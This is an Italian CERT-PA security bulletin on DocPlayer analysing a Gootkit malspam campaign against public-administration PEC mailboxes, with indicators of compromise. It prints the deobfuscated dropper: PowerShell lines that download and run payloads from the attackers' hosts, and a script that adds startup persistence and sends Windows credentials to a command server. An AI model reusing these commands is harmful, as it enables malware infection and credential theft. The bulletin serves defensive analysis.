ID: CERT-PA-B Data: 20/03/2019

Documenti analoghi
ID: CERT-PA-B Data: 09/12/2015

ID: CERT-PA-B Data: 27/07/2018

ID: CERT-PA-B Data: 10/03/2016

ID: CERT-PA-B Data: 29/07/2016

ID: CERT-PA-B Data: 17/12/2015

ID: CERT-PA-B Data: 26/10/2017

ID: CERT-PA-B Data: 07/05/2018

ID: CERT-PA-B Data: 18/04/2019

ID: CERT-PA-B Data: 07/04/2016

ID: CERT-PA-B Data: 05/01/2016

ID: CERT-PA-B Data: 20/10/2017

ID: CERT-PA-B Data: 29/12/2017

Massiva campagna di malspam Italiana con finti riferimenti a sentenze e contenuti giuridici - Variante del trojan bancario Ursnif -

L'applicazione integrata con il servizio My Fattura

Bollettino: Campagna sload indirizzata verso PEC dell Ordine degli Ingegneri di Roma. ID: CERT-PA-B Data: 10/06/2019

Integrazione Mitico John Deere. Invio Ordini Acquisto. JDSubmitOrder

04/04/2016 MANUALE DI ISTRUZIONI DELL APPLICAZIONE ENTRATEL-MULTIFILE VERSIONE 1.0.0

Installazione e configurazione DSFPA (Datasoftware Fattura Pubblica Amministrazione)

Fon.Coop Manuale GIFCOOP di rinnovo/ripristino utenze e password. del 09/04/2018

Bollettino: Statistiche vulnerabilità 2016

Documentazione e tutorial

La sicurezza nei documenti digitali: Il caso dei PDF (Parte 2)

SissiCheck. Manuale Operativo. SissiCheck. Versione

GUIDA OPERATIVA PER L ACCREDITAMENTO NEL REGISTRO DEI REVISORI LEGALI

Guida alla registrazione al Sistema di Gestione dell Albo Fornitori di REALE GROUP

FATTURAZIONE ELETTRONICA SERVIZIO FE

Istruzioni per l installazione ed uso del programma OMNICARD (rel.5.2) 18/04/2016

BOOLE SERVER - Installation guide-

Iscrizione nuovo Fornitore del Gruppo FSI al Portale Servizi ai Fornitori Guida operativa

Certificati di postazione

Data: Prodotto: Tekla Structures. Nuovo strumento di richiesta assistenza ed invio modelli

Qual è la procedura per aggiornare VIALIBERA Azienda ad una nuova versione? Risposta. 1 Avvio del setup di installazione

20/04/2017 MANUALE DI ISTRUZIONI DELL APPLICAZIONE ENTRATEL-MULTIFILE VERSIONE 1.0.6

Novità. SEE Electrical Expert V4R3 Service Pack 7

Pagina 1 di 6. Client SOAP di test per i servizi del Sistema di Interscambio. Indice

Note Tecniche - 3/2014

Venere TS Certificati (Guida operativa)

COMPATIBILITA E INSTALLAZIONE GIS PAGHE GIS PARCELLAZIONE GIS ANTIRICICLAGGIO GIS 770

Telematico Digitale. Note di Installazione

Dall esperienza della Porta di Dominio italiana, l API Gateway conforme alle normative della Pubblica Amministrazione.

MANUALE UTENTE. Portale Web Scambio sul posto GSE IMPRESE DI VENDITA. stato documento draft approvato consegnato

Guida invio Elenco Telematico Protesti

Estrattore Veneto per i MMG delle medicine integrate Procedura di invio dei dati (versione )

MANUALE UTENTE ACCESSO PORTALE SERVIZI DAIT

SafePlace Manuale utente

Guida alla fatturazione elettronica in Gescoop

Servizio upload fatture xml del Portale Servizi ai Fornitori del Gruppo FSI Guida operativa

manuale operativo sportello unico delle attività produttive InfoCamere Società Consortile di Informatica delle Camere di Commercio Italiane per azioni

Installazione e utilizzo Decoder 2DPlus su sistemi operativi Mac OSX

Utilizzo collegamento remoto

Villafranca Fatturazione Elettronica. Accesso e utilizzo del portale web. Fatturazione Elettronica - Computers Center snc 1

Tool di rinnovo self service: guida all uso

Basi di Dati. Applicazioni web in PHP per l interrogazione di basi di dati. Esercitazione n. 4

Firma Digitale Remota

Informativa sulla privacy di Norton Community Watch

GUIDA AL NUOVO MODULO DI FATTURAZIONE ELETTRONICA

Manuale DHApp (Digital Hub APP) Pagina 1. MANUALE DHApp. 1. Download e installazione dell applicazione Configurazione dell applicazione...

CONFIGURAZIONE IDESK CLIENTI PER FATTURAZIONE ELETTRONICA

Business Communications Manager e CallPilot 100/150

MAIL ENCRYPTOR PLUG-IN - User guide-

Si avvicina l obbligo della Fatturazione Elettronica tra privati

Manuale Utente Impostazione router Tele-assistenza

MANUALE TECNICO PER L'UTILIZZO DEL REDATTORE ATTI

Manuale di installazione. Gepra V1.1 Napoli 20 Aprile 2009

Caselle di Posta Elettronica

- Seconda Fase Iter Procedurale

Regione Emilia-Romagna: Il Sistema regionale per la dematerializzazione del ciclo degli acquisti.

STAR MANUALE UTENTE. Manuale d uso del Sistema Telematico di Accettazione Regionale delle pratiche SUAP

UNIVERSITA DEGLI STUDI DI TORINO. Direzione Sistemi Informativi, Portale, E-learning

Lynfa Azienda/Gamma Evolution Fatturazione elettronica

1. Maschera di log-in per l accesso al sistema

Le figure di documentazione

Net Service S.p.A. Guida all installazione di Consolle Avvocato Nuovo Installer Prot. D Documento emesso da Net Service S.p.A.

Aggiornamento database versione Aggiornamento procedure:

MANUALE UTENTE Cloud Base Cloud Professional Cloud Enterprise

DK Link. INTRODUZIONE A DK Link 2. LA COLLABORAZIONE CON FattureGO 2

MODALITA D USO DELLA MASCHERA D INSERIMENTO CARTA DI PREVENZIONE ICTUS in ACCESS. Indice. Introduzione Installazione Modalità d uso...

GUIDA ALLA REGISTRAZIONE

Basi di Dati. Applicazioni web in PHP per l interrogazione di basi di dati. Esercitazione n. 4

SUPER. (Sistema Unico Posta Elettronica Regionale) Gestione Profilo Account

Inventario e gestione

Guida pratica all attivazione della componente applet per la firma digitale interna al portale VestaNET

Day by Day. Note Installative. Foglio presenze per il mondo Web e la procedura Rewind. Day by Day INFORMATICA TELEMATICA CONSULENZA.

Le presenti note si riferiscono esclusivamente alla procedura di installazione e di aggiornamento di Planet HR.

A. DOWNLOAD della versione di prova 30 giorni del software Autodesk Revit.

Pama Drive quick start guide Pama internal

Presentazione Domande di Disoccupazione Agricoli e/o A.N.F. Internet Versione 1.0

Circolare n. 10 del

VPN e FortiClient (Windows)

ALLEGATO AL CAPITOLATO TECNICO

MANUALE UTENTE INTERNO

Aggiornamento gestione Mittenti telematici Aggiornamento Entratel - Multifile ver

Manuale Utente. Servizio Quick Print. Equitalia Servizi SpA. Status: In Vigore. Titolo Documento : Manuale Utente - Servizio Quick Print

ACCESSO ALLA POSTA ELETTRONICA TRAMITE OUTLOOK WEB ACCESS

Sommario. 1 La shell di Windows PowerShell... 1

Indice. Introduzione. Capitolo 1 Introduzione a Windows Server Edizioni di Windows Server

Desktop telematico : la novità dal 1 dicembre 2016

Firma digitale della distinta

Transcript:

Bollettino: Campagna di malspam Gootkit indirizzata verso PEC italiane ID: CERT-PA-B001-190320 Data: 20/03/2019 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal CERT-PA, al fine di consentire loro di avviare tempestivamente valutazioni di impatto sui propri sistemi informativi e implementare le misure di contrasto/contenimento dei rischi correlati. Il CERT-PA, nell erogare al meglio questo servizio, si avvale di propri fornitori e di fonti pubbliche disponibili in Rete, individuati e selezionati tra i più autorevoli organismi di sicurezza, aziende specializzate e fornitori di tecnologie, al fine di garantire alla comunità di riferimento con la massima accuratezza, affidabilità e tempestività possibile le informazioni utili per la prevenzione e la gestione degli incidenti di sicurezza informatica. Non è consentito far uso di queste informazioni per finalità differenti da quelle sopra indicate. La presenza di rinvii operati mediante tecniche di ipertesto (link) non costituisce una raccomandazione del CERT-PA verso il soggetto richiamato, ma unicamente uno strumento per facilitare il rapido recupero di informazioni utili.

Indice Sommario... 2 1. Analisi sample, opportunamente offuscato, individuato da P.A.... 2 Analisi tecnica del dropper... 3 Primo step... 3 Secondo step... 5 Analisi eseguibile Gootkit... 8 Indicatori di Compromissione... 11 Network... 11 Url... 11 Domain... 11 File... 11 CERT-PA-B001-190320 1

Sommario Questa sezione contiene l elenco delle minacce oggetto del bollettino. Dalle segnalazioni e dal monitoraggio delle fonti, il CERT-PA riporta le seguenti evidenze: 1. Analisi sample, opportunamente offuscato, individuato da P.A. Il CERT-PA ha recentemente rilevato una campagna di malspam rivolta verso utenze italiane ed, in particolare, verso caselle su domini di posta riferibili a strutture della PP.AA. Dal monitoraggio degli eventi connessi alla campagna e dalle analisi svolte su alcuni campioni, pervenuti dalla Constituency del CERT-PA ed estrapolati da una email contenente due allegati, di cui uno malevolo, sono emerse evidenze di particolare interesse in merito alle tecniche di offuscazione utilizzate per occultare il codice. Il sample analizzato si presenta come una variante del noto Gootkit e tra le prime operazioni effettuate vi è l invio delle credenziali della macchina infettata ad una url presumibilmente usata come C&C. CERT-PA-B001-190320 2

Analisi tecnica del dropper L email esaminata contiene i seguenti allegati: 2019 1110-Eseguito_Bonifico_Europeo_Unico_0000_11075.xm, un file XML contenente riferimenti a pagopa e con estensione (volutamente?) incompleta; 2019 1110-Eseguito_Bonifico_Europeo_Unico_0000_11075 xm.js, il dropper vero e proprio. Primo step Il primo step riguarda l analisi del file JS allegato alla mail contenente il seguente codice offuscato: gsbafbhjtsev = new Array(); gsbafbhjtsev.push("i"); gsbafbhjtsev.push("av49f"); gsbafbhjtsev.push("5xud(sqt9w3eu4a87waxc98s"); gsbafbhjtsev.push("e"); gsbafbhjtsev.push("b54raqr4esbuv>wra2b2"); gsbafbhjtsev.push("r3dq0wzt6y9tz7dw5uquvy06b6sa)v67r"); gsbafbhjtsev.push("{wz3ss"); gsbafbhjtsev.push("9r88cvwt"); [--- snip ---] gsbafbhjtsev.push("72vzdq6wdaw7uxww"); gsbafbhjtsev.push("xa3bd5qa49sbwzz2wwwe"); gsbafbhjtsev.push("wws2ztaztv5a7\"vvv2a ESRzR 24B8R AzR"); gsbafbhjtsev.push("z"); var a = 6; var b = ""; var c = gsbafbhjtsev.join(" ").split(""); for( var x = 0; x < c.length; x++){ if( a == 6 ){ b += c[x]; a = 0; a ++; eval( b ); Table 1 - Codice offuscato del dropper Una volta deoffuscato si ottiene del codice con ulteriore livello di offuscazione, seppur minimo. CERT-PA-B001-190320 3

if(37854>20950){cgxuygczdvdhggzsdwcti=-6463;hxitvvwuzdjeczjsfef =92280;try{ xwjxxaaxiaxgsacifuvet =6606; settimeout(function(){ vwvhhtdds = "wcbysjxhjghxhceg";,8552);catch(err){gzutvubvvsdacuzx = "vfcgszccfwsg";( new ActiveXObject( "wscript.shell" ) ).Run("powershell $bvfxfwgexcgywxivvsxz = [System.IO.Path]::GetTempPath() +'"+String.fromCharCode(92)+"..' +'"+String.fromCharCode(92)+"' + 'SMSvcHost32.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?axajezwjhcagguewvhc j',$bvfxfwgexcgywxivvsxz);start-sleep -s 30; Start-Process $bvfxfwgexcgywxivvsxz;", 17020-7924 - 8881-215);hgzwdjdxbteeg = "aejtxbvafa";xceeysiychbweuzxbhb = "catxcjhdhydcautbzgs";( new ActiveXObject( "wscript.shell" ) ).Run("powershell $egudvyzjiwuwejcavac = [System.IO.Path]::GetTempPath() + '"+String.fromCharCode(92)+"SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?xhhxsw',$egudvyzjiw uwejcavac); Start-Process $egudvyzjiwuwejcavac;", 15040-6438 - 3912-4690);ifbzabia = "ditzhdweitzsgztcjiitey";; wuejhvjcihsyutzgadjcjc="wyguaiaxfghcfedyedztdbafedvszawdswwz" Table 2 - Secondo livello di offuscamento di codice Riscrivendo meglio il codice ed evidenziando le parti più salienti (Tabella 3), si evince che il dropper effettua il download di due file: il Malware vero e proprio ed un ulteriore file JS. [...] (new ActiveXObject("wscript.shell")).Run("powershell $bvfxfwgexcgywxivvsxz = [System.IO.Path]::GetTempPath() +'" + String.fromCharCode(92) + "..' +'" + String.fromCharCode(92) + "' + 'SMSvcHost32.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?axajezwjhcagguewvhc j',$bvfxfwgexcgywxivvsxz);start-sleep -s 30; Start-Process $bvfxfwgexcgywxivvsxz;", 17020-7924 - 8881-215); [...] (new ActiveXObject("wscript.shell")).Run("powershell $egudvyzjiwuwejcavac = [System.IO.Path]::GetTempPath() + '" + String.fromCharCode(92) + "SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?xhhxsw',$egudvyzjiw uwejcavac); Start-Process $egudvyzjiwuwejcavac;", 15040-6438 - 3912-4690); Table 3 - Download del Malware Analizzando il codice in Tabella 3 si può notare come il dropper effettui due distinti download utilizzando comandi PowerShell: 1. Il primo file ad essere scaricato è il Malware, dalla url http://cloud.kokoheadattorney.com/501?axajezwjhcagguewvhcj, e salvato nella cartella dei file temporanei di Windows con il nome di SMSvcHost32.exe. Al termine del download, il file vene eseguito; CERT-PA-B001-190320 4

2. In seconda battuta viene scaricato un ulteriore JavaScript dalla url http://cloud.kokoheadattorney.com/502?xhhxsw, successivamente salvato col nome di SearchI32.js, anch esso all interno della cartella temp per poi essere eseguito. Secondo step Una volta eseguito il secondo JS scaricato si ottiene il seguente codice, anch esso offuscato: if(87981>1799){ftuzujbggugxsyc=86486;jvfgab =94742;try{ iazsusyabwvfcf =88803; settimeout(function(){ gttfdawhffazbiaszubxbeiyh = "fttwxfhyguxufegbsseffxtb";,8552);catch(err){( new ActiveXObject( "wscript.shell" ) ).Run("powershell $satubfusshwsw = [System.IO.Path]::GetTempPath() + '"+String.fromCharCode(92)+"SearchI32.txt';$vzdshcsfwhycwjwcdyjhsu = '';if(![system.io.file]::exists($satubfusshwsw) ){( New-Object System.Net.WebClient ).DownloadFile('http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E8693 0.php',$satubfusshwsw);;Get-Content $satubfusshwsw Where-Object {$_ - match $regex ForEach-Object { $vzdshcsfwhycwjwcdyjhsu += $_ -replace '..(.)','$1' ;Invoke-Expression -Command $vzdshcsfwhycwjwcdyjhsu;", 6651-336 - 2400-3915);ydutajxtuiyuttxzecyguyad = "dhvhifcytyvw";; xaduvwchuxetsxxyduxiieshbfdf="yvsbtwdwbvutazayweg" Table 4 - Codice offuscato all interno del file SearchI32.js (secondo JS scaricato) Anche in questo caso, riscrivendo meglio il codice ed evidenziando le parti importanti si nota il download di un ulteriore file: [...] (new ActiveXObject("wscript.shell")).Run("powershell $satubfusshwsw = [System.IO.Path]::GetTempPath() + '" + String.fromCharCode(92) + "SearchI32.txt'; $vzdshcsfwhycwjwcdyjhsu = ''; if(![system.io.file]::exists($satubfusshwsw) ){( New-Object System.Net.WebClient ).DownloadFile('http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php',$satubfusshwsw );; Get-Content $satubfusshwsw Where-Object {$_ -match $regex ForEach-Object { $vzdshcsfwhycwjwcdyjhsu += $_ -replace '..(.)','$1' ; Invoke-Expression -Command $vzdshcsfwhycwjwcdyjhsu;", 6651-336 - 2400-3915); [...] Table 5 - Download di un ulteriore file adibito all'invio delle credenziali macchina In questo caso viene, quindi, effettuato il download di un file che punta ad una risorsa php attraverso la seguente url http://cdn.zaczvk.pl/crypt0dd1d2637fdb71097213d70b94e86930.php e anch esso, una volta salvato tra i file temporanei del sistema col nome di SearchI32.txt, viene eseguito. Analizzando il suddetto file (Tabella 6) si apprende come esso venga usato per inviare ad una specifica url le credenziali di accesso al sistema Windows compromesso: CERT-PA-B001-190320 5

$ver = 318.02; $url_adm = 'http://space.bajamelide.ch/'; $timeout = 120; $my_dir = [System.IO.Path]::GetTempPath(); $ldr = 'SearchI32'; $stop_id = Join-Path $my_dir '1'; $exe_file = Join-Path $my_dir 'SearchI32.exe'; $ldr_file = Join-Path $my_dir 'SearchI32.txt'; $JS_file = Join-Path $my_dir 'SearchI32.js'; $runfile = Join-Path $my_dir 'SearchI32.tmp'; [...] // 1. Creazione di un file.lnk in Avvio Automatico $CheckAutoRun_lnk = [Environment]::GetFolderPath('Startup') + '\Windows Indexing Service '+$ldr+'.lnk'; if(![system.io.file]::exists($checkautorun_lnk) ) { $Shell = New-Object -ComObject ('WScript.Shell'); $ShortCut = $Shell.CreateShortcut( $CheckAutoRun_lnk ); $ShortCut.Arguments= $JS_file; $ShortCut.TargetPath = 'cscript.exe'; $ShortCut.WorkingDirectory = $my_dir; $ShortCut.WindowStyle = 1; $ShortCut.Description = 'Windows Indexing Service'; $ShortCut.Save(); // 2. Generazione dell id del pc infetto try { $bot_id = (Get-WmiObject -class Win32_ComputerSystem -Property Name).Name + '_'; catch { $bot_id = 'OMG_'; try { foreach ($disk in (gwmi win32_diskdrive)) { $bot_id += [convert]::tostring($disk.signature, 16); catch { $bot_id += '0000000'; CERT-PA-B001-190320 6

$count = 0; // 3. invio delle credenziali di accesso a Windows $req = New-Object System.Net.WebClient; $req.credentials = [System.Net.CredentialCache]::DefaultCredentials; $req.querystring.add('b', $bot_id ); $req.querystring.add('v', $ver ); Table 6 - Analisi del file SearchI32.txt Come evidenziato dai commenti in grassetto (aggiunti dagli analisti del CERT-PA) si possono osservare tre principali operazioni compiute dal file SearchI32.txt: 1. Viene creato, in avvio automatico (in modo che venga eseguito ad ogni avvio del sistema e quindi garantirsi la persistenza) un collegamento (file.lnk) al processo di sistema cscript.exe a cui viene passato il file SearchI32.js analizzato in precedenza.; 2. Viene generato un id univoco della macchina infetta ottenuto dalla concatenazione del nome della macchina (attraverso il comando PowerShell Get-WmiObject -class Win32_ComputerSystem -Property Name).Name) isolando i primi 8 caratteri della signature dei dischi presenti nella macchina ([convert]::tostring($disk.signature, 16);) ottenendo un id del tipo: COMPUTER-NAME_ah4k85hb; 3. Invia le credenziali di autenticazione a Windows (attraverso il comando [System.Net.CredentialCache]::DefaultCredentials ) e l id generato (bot_id) alla url http://space.bajamelide.ch. CERT-PA-B001-190320 7

Analisi eseguibile Gootkit Il file eseguibile, ottenuto dal primo step, viene salvato dallo script iniziale con il nome SMSvcHost32.exe. Dall analisi statica è possibile osservare alcune importanti caratteristiche del malware successivamente confermate in fase di debug. Il codice risulta offuscato con uno XOR con chiave 0x4e, presenta funzionalità di antidebug e la sezione.text, che ospita codice eseguibile, riporta un valore di entropia pari a 7.88. La funzione XOR viene utilizzata per riesumare le informazioni occultate nel codice come i domini da contattare e le funzioni da invocare. CERT-PA-B001-190320 8

Il sample, appartenente alla famiglia gootkit, di cui il CERT-PA ha avuto modo di analizzare le varianti precedenti, non si discosta molto dalle versioni veicolate nelle ultime settimane, ma come ci si aspettava sfrutta nuovi C&C per comunicare. Stando a quanto emerso dalle analisi, il sample estrae dalla routine XOR due domini nonostante prediliga le richieste verso un unico server localizzato in Germania, probabilmente finchè quest ultimo risulta attivo. Di seguito la preparazione della richiesta: Il dominio contattato è ws.diminishedvalueoregon.com e, come di consueto, la richiesta è volta a puntare su uno dei seguenti file: /rbody32 /rbody320 /rbody64 Nel corso dell analisi è emerso un altro domino meenwae.top di cui si ha evidenza essere stato utilizzato di recente con lo scopo di veicolare malware come Emotet, Lokibot, Dridex etc. CERT-PA-B001-190320 9

Il sample osserva le configurazioni relative alla connettività Internet attraverso il registro di sistema, nello specifico verifica la presenza di proxy, verifica inoltre le chiavi SystemBiosVersion e VideoBiosVersion da HKLM\HARDWARE\DESCRIPTION\System per individuare se l ambiente di esecuzione è virtuale. Infine raccoglie informazioni dalla macchina compromessa e le organizza per inviarle al server di command and control da cui successivamente riceverà nuovi file e istruzioni per procedere con il furto di dati e credenziali. CERT-PA-B001-190320 10

Indicatori di Compromissione Network Url https://ws.diminishedvalueoregon.com/rbody32 https://ws.diminishedvalueoregon.com/rbody320 https://ws.diminishedvalueoregon.com/rbody64 https://meenwae.top/ http://cloud.kokoheadattorney.com/501?axajezwjhcagguewvhcj http://cdn.zaczvk.pl/crypt0dd1d2637fdb71097213d70b94e86930.php Domain ws.diminishedvalueoregon.com meenwae.top cloud.kokoheadattorney.com cdn.zaczvk.pl File 2019 1110-Eseguito_Bonifico_Europeo_Unico_0000_11075.xm o MD5: 675bf6e6782ee5fc5df7600d8d22ac9b o SHA1: bebfd24c3868d1f51ff5a375aaf63756d1e8a5c9 o SHA256: 0e9acd54b3bd3aceb7b526808044964752cb357531dd0e0b743967e3cc5a9ba4 2019 1110-Eseguito_Bonifico_Europeo_Unico_0000_11075 xm.js o MD5: c433f076bf38728a175b71b3bba62582 o SHA1: 18e03386a6ab78a35e1ad4413dd42c3ac2dd098a o SHA256: 6c416de99049a1b38a75b402c1ba26594eb3fd0adc3290c0d97ce93ede47432f SMSvcHost32.exe o MD5: 514c64456c6455477546c81127f6d869 o SHA1: 73ea01c8d2cef4777085e609f0fe386bd5775f86 o SHA256: 50c5031899fcb3eec49d2f147adbeaba6312cfd068530526ac59674f412fdb44 SearchI32.js o MD5: 70ce0f76cb4cf493d43836c8542917b5 o SHA1: 4b1b00f78d38570c006cd3192ac33013f35aed93 o SHA256: e88ee63c510be1def6af067c3f69eeae36f130f2fb34a606af0b289124f77f23 SearchI32.txt o MD5: a4c1ddaecdff4365c59032c5df72d9f7 o SHA1: 02561878ce7cf079f017e2875fd1f32662277f09 o SHA256: 675a3cd24978b01f6cdefcb0593f9db99953a68f33552aefe1643da3331ef6c4 CERT-PA-B001-190320 11

2024 © DocPlayer.it Privacy Policy | Condizioni del servizio | Feed-back